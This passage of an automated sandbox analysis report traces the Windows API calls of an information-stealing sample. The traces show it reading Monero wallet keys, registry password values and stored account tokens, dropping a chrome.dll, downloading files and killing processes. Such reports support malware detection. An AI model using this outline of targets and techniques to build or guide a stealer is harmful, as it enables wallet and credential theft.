                                      • lstrcat.KERNEL32(?,.keys), ref: 00D31377
                                        • Part of subcall function 00D4AA50: lstrcpy.KERNEL32(00D50E1A,00000000), ref: 00D4AA98
                                        • Part of subcall function 00D4ACC0: lstrlen.KERNEL32(?,01678F98,?,\Monero\wallet.keys,00D50E1A), ref: 00D4ACD5
                                        • Part of subcall function 00D4ACC0: lstrcpy.KERNEL32(00000000), ref: 00D4AD14
                                        • Part of subcall function 00D4ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00D4AD22
                                        • Part of subcall function 00D4ABB0: lstrcpy.KERNEL32(?,00D50E1A), ref: 00D4AC15
                                        • Part of subcall function 00D48CF0: GetSystemTime.KERNEL32(00D50E1B,0167A270,00D505B6,?,?,00D313F9,?,0000001A,00D50E1B,00000000,?,01678F98,?,\Monero\wallet.keys,00D50E1A), ref: 00D48D16
                                        • Part of subcall function 00D4AC30: lstrcpy.KERNEL32(00000000,?), ref: 00D4AC82
                                        • Part of subcall function 00D4AC30: lstrcat.KERNEL32(00000000), ref: 00D4AC92
                                      • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00D31465
                                        • Part of subcall function 00D4AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00D4AAF6
                                        • Part of subcall function 00D3A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00D3A13C
                                        • Part of subcall function 00D3A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00D3A161
                                        • Part of subcall function 00D3A110: LocalAlloc.KERNEL32(00000040,?), ref: 00D3A181
                                        • Part of subcall function 00D3A110: ReadFile.KERNEL32(000000FF,?,00000000,00D3148F,00000000), ref: 00D3A1AA
                                        • Part of subcall function 00D3A110: LocalFree.KERNEL32(00D3148F), ref: 00D3A1E0
                                        • Part of subcall function 00D3A110: CloseHandle.KERNEL32(000000FF), ref: 00D3A1EA
                                      • DeleteFileA.KERNEL32(00000000), ref: 00D314EF
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                                      • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                                      • API String ID: 3478931302-218353709
                                      • Opcode ID: 69c0be24cfce2e50893c31a415f0f84df1b0f87c625aa471eb5d294ef30cf8c0
                                      • Instruction ID: 9ff7c72d5c02cd05916c37abb4507dbd235ee0e47297053bbd786ac466e0caf9
                                      • Opcode Fuzzy Hash: 69c0be24cfce2e50893c31a415f0f84df1b0f87c625aa471eb5d294ef30cf8c0
                                      • Instruction Fuzzy Hash: 6C5140B1D501199BDB25EB64DDA2FED733CDF54300F4045D8B60A62082EE746B88CBB6
                                      APIs
                                        • Part of subcall function 00D37330: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00D3739A
                                        • Part of subcall function 00D37330: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00D37411
                                        • Part of subcall function 00D37330: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00D3746D
                                        • Part of subcall function 00D37330: GetProcessHeap.KERNEL32(00000000,?), ref: 00D374B2
                                        • Part of subcall function 00D37330: HeapFree.KERNEL32(00000000), ref: 00D374B9
                                      • lstrcat.KERNEL32(00000000,00D5192C), ref: 00D37666
                                      • lstrcat.KERNEL32(00000000,00000000), ref: 00D376A8
                                      • lstrcat.KERNEL32(00000000, : ), ref: 00D376BA
                                      • lstrcat.KERNEL32(00000000,00000000), ref: 00D376EF
                                      • lstrcat.KERNEL32(00000000,00D51934), ref: 00D37700
                                      • lstrcat.KERNEL32(00000000,00000000), ref: 00D37733
                                      • lstrcat.KERNEL32(00000000,00D51938), ref: 00D3774D
                                      • task.LIBCPMTD ref: 00D3775B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                      • Associated: 00000000.00000002.1762225384.0000000000D30000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762237620.0000000000D5C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762237620.0000000000E6D000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762237620.0000000000E79000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762237620.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762237620.0000000001006000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.000000000101A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.00000000011A6000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.0000000001281000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.00000000012A3000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.00000000012AE000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.00000000012BC000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1765492975.00000000012BD000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1765610094.0000000001459000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1765625771.000000000145A000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
                                      • String ID: :
                                      • API String ID: 2677904052-3653984579
                                      • Opcode ID: a37c17e4dca055e40bee07320c3b491a4bea2f59fb7282b94566d5510da0047c
                                      • Instruction ID: 90b8134ba4ba2fcf049d066af494664fed258f05a2eadffb42f34ca7a0a095b5
                                      • Opcode Fuzzy Hash: a37c17e4dca055e40bee07320c3b491a4bea2f59fb7282b94566d5510da0047c
                                      • Instruction Fuzzy Hash: 5E315EB5904208DBDB19EBA4DCA9DFE7379EB44301F104208F59263294DA3DA94ADB70
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,0167E4D0,00000000,?,00D50E14,00000000,?,00000000), ref: 00D482C0
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00D482C7
                                      • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00D482E8
                                      • __aulldiv.LIBCMT ref: 00D48302
                                      • __aulldiv.LIBCMT ref: 00D48310
                                      • wsprintfA.USER32 ref: 00D4833C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                      • Associated: 00000000.00000002.1762225384.0000000000D30000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762237620.0000000000D5C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762237620.0000000000E6D000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762237620.0000000000E79000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762237620.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762237620.0000000001006000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.000000000101A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.00000000011A6000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.0000000001281000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.00000000012A3000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.00000000012AE000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.00000000012BC000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1765492975.00000000012BD000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1765610094.0000000001459000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1765625771.000000000145A000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                                      • String ID: %d MB$@
                                      • API String ID: 2774356765-3474575989
                                      • Opcode ID: cea2b8596bff6f4dd0000a3908bfbcba0f1583f57d4d6ff90557a386de7d8f2f
                                      • Instruction ID: 1120b35ab6dcbac3fb6fda955a178c94e9185208b1cdcc38d39e3f12fdfc29ed
                                      • Opcode Fuzzy Hash: cea2b8596bff6f4dd0000a3908bfbcba0f1583f57d4d6ff90557a386de7d8f2f
                                      • Instruction Fuzzy Hash: EF2108B1E44208ABDB10DFD4CC4AFAEB7B9FB44B10F104519F655BB280C77969048BB5
                                      APIs
                                        • Part of subcall function 00D4AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00D4AAF6
                                        • Part of subcall function 00D34800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00D34889
                                        • Part of subcall function 00D34800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00D34899
                                      • InternetOpenA.WININET(00D50DFB,00000001,00000000,00000000,00000000), ref: 00D3615F
                                      • StrCmpCA.SHLWAPI(?,0167E7D8), ref: 00D36197
                                      • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 00D361DF
                                      • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00D36203
                                      • InternetReadFile.WININET(?,?,00000400,?), ref: 00D3622C
                                      • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00D3625A
                                      • CloseHandle.KERNEL32(?,?,00000400), ref: 00D36299
                                      • InternetCloseHandle.WININET(?), ref: 00D362A3
                                      • InternetCloseHandle.WININET(00000000), ref: 00D362B0
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                      • Associated: 00000000.00000002.1762225384.0000000000D30000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762237620.0000000000D5C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762237620.0000000000E6D000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762237620.0000000000E79000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762237620.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762237620.0000000001006000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.000000000101A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.00000000011A6000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.0000000001281000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.00000000012A3000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.00000000012AE000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.00000000012BC000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1765492975.00000000012BD000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1765610094.0000000001459000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1765625771.000000000145A000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                      • String ID:
                                      • API String ID: 2507841554-0
                                      • Opcode ID: 7b7a0fb6e5f1272beed3dedee509ef0957bb43edeb06ac165d6108cebd852cdb
                                      • Instruction ID: 0d05d6260759aa9d3c063870410121fd86a45a4a38cfc88385615f386de9a17b
                                      • Opcode Fuzzy Hash: 7b7a0fb6e5f1272beed3dedee509ef0957bb43edeb06ac165d6108cebd852cdb
                                      • Instruction Fuzzy Hash: 2E5163B1A40218ABDF20DF94CC45BEE7779EB44301F108098F645A71C1DB79AA89CFB9
                                      APIs
                                      • type_info::operator==.LIBVCRUNTIME ref: 00DB024D
                                      • ___TypeMatch.LIBVCRUNTIME ref: 00DB035B
                                      • CatchIt.LIBVCRUNTIME ref: 00DB03AC
                                      • CallUnexpected.LIBVCRUNTIME ref: 00DB04C8
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762237620.0000000000D5C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                      • Associated: 00000000.00000002.1762225384.0000000000D30000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762237620.0000000000E6D000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762237620.0000000000E79000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762237620.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762237620.0000000001006000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.000000000101A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.00000000011A6000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.0000000001281000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.00000000012A3000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.00000000012AE000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.00000000012BC000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1765492975.00000000012BD000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1765610094.0000000001459000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1765625771.000000000145A000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CallCatchMatchTypeUnexpectedtype_info::operator==
                                      • String ID: csm$csm$csm
                                      • API String ID: 2356445960-393685449
                                      • Opcode ID: 0aa7d8e53ae69f4e65a14af659269dcd6c8d533d9c3592b436de8e99f8465a7b
                                      • Instruction ID: 161ff28a4308801ab01718fd6924be2dcab3fafe2874d8ace669dedcd0b663f1
                                      • Opcode Fuzzy Hash: 0aa7d8e53ae69f4e65a14af659269dcd6c8d533d9c3592b436de8e99f8465a7b
                                      • Instruction Fuzzy Hash: F1B16971800209EFCF25DFA4C8859EFBBB5FF05310B1881AAE9166B212D735DA51CBB1
                                      APIs
                                      • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00D3739A
                                      • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00D37411
                                      • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00D3746D
                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 00D374B2
                                      • HeapFree.KERNEL32(00000000), ref: 00D374B9
                                      • task.LIBCPMTD ref: 00D375B5
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                      • Associated: 00000000.00000002.1762225384.0000000000D30000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762237620.0000000000D5C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762237620.0000000000E6D000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762237620.0000000000E79000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762237620.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762237620.0000000001006000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.000000000101A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.00000000011A6000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.0000000001281000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.00000000012A3000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.00000000012AE000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.00000000012BC000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1765492975.00000000012BD000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1765610094.0000000001459000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1765625771.000000000145A000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$EnumFreeOpenProcessValuetask
                                      • String ID: Password
                                      • API String ID: 775622407-3434357891
                                      • Opcode ID: 8ed3db0f863e30e637bd8dac21e3be32a0278fb978fede8f8fbe2a1176758ff0
                                      • Instruction ID: 4d9696ec1e9bd095abd4268d05cf00f96d8a47c1f242c64f6e8ac0e672a370b2
                                      • Opcode Fuzzy Hash: 8ed3db0f863e30e637bd8dac21e3be32a0278fb978fede8f8fbe2a1176758ff0
                                      • Instruction Fuzzy Hash: 27610CB590425C9BDB25DB50CC55BDAB7B8FF48300F0481E9E689A6145EBB06BC9CFB0
                                      APIs
                                        • Part of subcall function 00D4AA50: lstrcpy.KERNEL32(00D50E1A,00000000), ref: 00D4AA98
                                        • Part of subcall function 00D4ACC0: lstrlen.KERNEL32(?,01678F98,?,\Monero\wallet.keys,00D50E1A), ref: 00D4ACD5
                                        • Part of subcall function 00D4ACC0: lstrcpy.KERNEL32(00000000), ref: 00D4AD14
                                        • Part of subcall function 00D4ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00D4AD22
                                        • Part of subcall function 00D4AC30: lstrcpy.KERNEL32(00000000,?), ref: 00D4AC82
                                        • Part of subcall function 00D4AC30: lstrcat.KERNEL32(00000000), ref: 00D4AC92
                                        • Part of subcall function 00D4ABB0: lstrcpy.KERNEL32(?,00D50E1A), ref: 00D4AC15
                                        • Part of subcall function 00D4AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00D4AAF6
                                      • lstrlen.KERNEL32(00000000), ref: 00D3BC6F
                                        • Part of subcall function 00D48FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00D48FE2
                                      • StrStrA.SHLWAPI(00000000,AccountId), ref: 00D3BC9D
                                      • lstrlen.KERNEL32(00000000), ref: 00D3BD75
                                      • lstrlen.KERNEL32(00000000), ref: 00D3BD89
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                      • Associated: 00000000.00000002.1762225384.0000000000D30000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762237620.0000000000D5C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762237620.0000000000E6D000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762237620.0000000000E79000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762237620.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762237620.0000000001006000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.000000000101A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.00000000011A6000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.0000000001281000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.00000000012A3000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.00000000012AE000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.00000000012BC000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1765492975.00000000012BD000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1765610094.0000000001459000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1765625771.000000000145A000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                                      • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                                      • API String ID: 3073930149-1079375795
                                      • Opcode ID: 613051cdee2e2f12f09cc1e284b6c1c74b3a1ac68c8e0ebc5b44879d19a3d248
                                      • Instruction ID: e6781a8c909453a4f51c74c54f78575e71cf2579937eadaa2206be49ebc22d8b
                                      • Opcode Fuzzy Hash: 613051cdee2e2f12f09cc1e284b6c1c74b3a1ac68c8e0ebc5b44879d19a3d248
                                      • Instruction Fuzzy Hash: 20B15E76950118ABEF14FFA8DCA6EEE7339EF54301F404569F50662092EF346A48CB72
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                      • Associated: 00000000.00000002.1762225384.0000000000D30000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762237620.0000000000D5C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762237620.0000000000E6D000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762237620.0000000000E79000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762237620.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762237620.0000000001006000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.000000000101A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.00000000011A6000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.0000000001281000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.00000000012A3000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.00000000012AE000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.00000000012BC000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1765492975.00000000012BD000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1765610094.0000000001459000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1765625771.000000000145A000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ExitProcess$DefaultLangUser
                                      • String ID: *
                                      • API String ID: 1494266314-163128923
                                      • Opcode ID: 01db7ccb0fb1af8384ec909d6b3fc8d53fce5f70e3885258adcf7ef0c7076fa4
                                      • Instruction ID: 2555797822ca4f058d32fa9167dbf183b93fcab5fa219e18b74c225db08ae71f
                                      • Opcode Fuzzy Hash: 01db7ccb0fb1af8384ec909d6b3fc8d53fce5f70e3885258adcf7ef0c7076fa4
                                      • Instruction Fuzzy Hash: B8F0A730908209EFD755DFE4E4097DCBB31EB05707F1141A5F6CA961C4C67EAA40DB62
                                      APIs
                                        • Part of subcall function 00D4AA50: lstrcpy.KERNEL32(00D50E1A,00000000), ref: 00D4AA98
                                        • Part of subcall function 00D49850: CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,00D408DC,C:\ProgramData\chrome.dll), ref: 00D49871
                                      • StrCmpCA.SHLWAPI(00000000,01679078), ref: 00D40922
                                      • StrCmpCA.SHLWAPI(00000000,01679088), ref: 00D40B79
                                      • StrCmpCA.SHLWAPI(00000000,01678FD8), ref: 00D40A0C
                                        • Part of subcall function 00D4AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00D4AAF6
                                      • DeleteFileA.KERNEL32(C:\ProgramData\chrome.dll), ref: 00D40C35
                                      Strings
                                      • C:\ProgramData\chrome.dll, xrefs: 00D408CD
                                      • C:\ProgramData\chrome.dll, xrefs: 00D40C30
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                      • Associated: 00000000.00000002.1762225384.0000000000D30000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762237620.0000000000D5C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762237620.0000000000E6D000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762237620.0000000000E79000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762237620.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762237620.0000000001006000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.000000000101A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.00000000011A6000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.0000000001281000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.00000000012A3000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.00000000012AE000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.00000000012BC000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1765492975.00000000012BD000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1765610094.0000000001459000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1765625771.000000000145A000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Filelstrcpy$CreateDelete
                                      • String ID: C:\ProgramData\chrome.dll$C:\ProgramData\chrome.dll
                                      • API String ID: 1958263904-663540502
                                      • Opcode ID: 4b4e5d33cf4b3bceaeb8c4ade5d253735ea483cfd9ede8c2d9f7b283f7acb767
                                      • Instruction ID: f88dade1239d32ca336d6227ac583f3a77d9333b532072e6a8dddfe452a22061
                                      • Opcode Fuzzy Hash: 4b4e5d33cf4b3bceaeb8c4ade5d253735ea483cfd9ede8c2d9f7b283f7acb767
                                      • Instruction Fuzzy Hash: ABA147717001099FCB28EF68D996EAD7776EF94300F10816DE90A9F255DA30DA09CBB2
                                      APIs
                                        • Part of subcall function 00D48CF0: GetSystemTime.KERNEL32(00D50E1B,0167A270,00D505B6,?,?,00D313F9,?,0000001A,00D50E1B,00000000,?,01678F98,?,\Monero\wallet.keys,00D50E1A), ref: 00D48D16
                                      • wsprintfA.USER32 ref: 00D39E7F
                                      • lstrcat.KERNEL32(00000000,?), ref: 00D39F03
                                      • lstrcat.KERNEL32(00000000,?), ref: 00D39F17
                                      • lstrcat.KERNEL32(00000000,00D512D8), ref: 00D39F29
                                      • lstrcpy.KERNEL32(?,00000000), ref: 00D39F7C
                                      • Sleep.KERNEL32(00001388), ref: 00D3A013
                                        • Part of subcall function 00D499A0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00D499C5
                                        • Part of subcall function 00D499A0: Process32First.KERNEL32(00D3A056,00000128), ref: 00D499D9
                                        • Part of subcall function 00D499A0: Process32Next.KERNEL32(00D3A056,00000128), ref: 00D499F2
                                        • Part of subcall function 00D499A0: OpenProcess.KERNEL32(00000001,00000000,?), ref: 00D49A4E
                                        • Part of subcall function 00D499A0: TerminateProcess.KERNEL32(00000000,00000000), ref: 00D49A6C
                                        • Part of subcall function 00D499A0: CloseHandle.KERNEL32(00000000), ref: 00D49A79
                                        • Part of subcall function 00D499A0: CloseHandle.KERNEL32(00D3A056), ref: 00D49A88
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
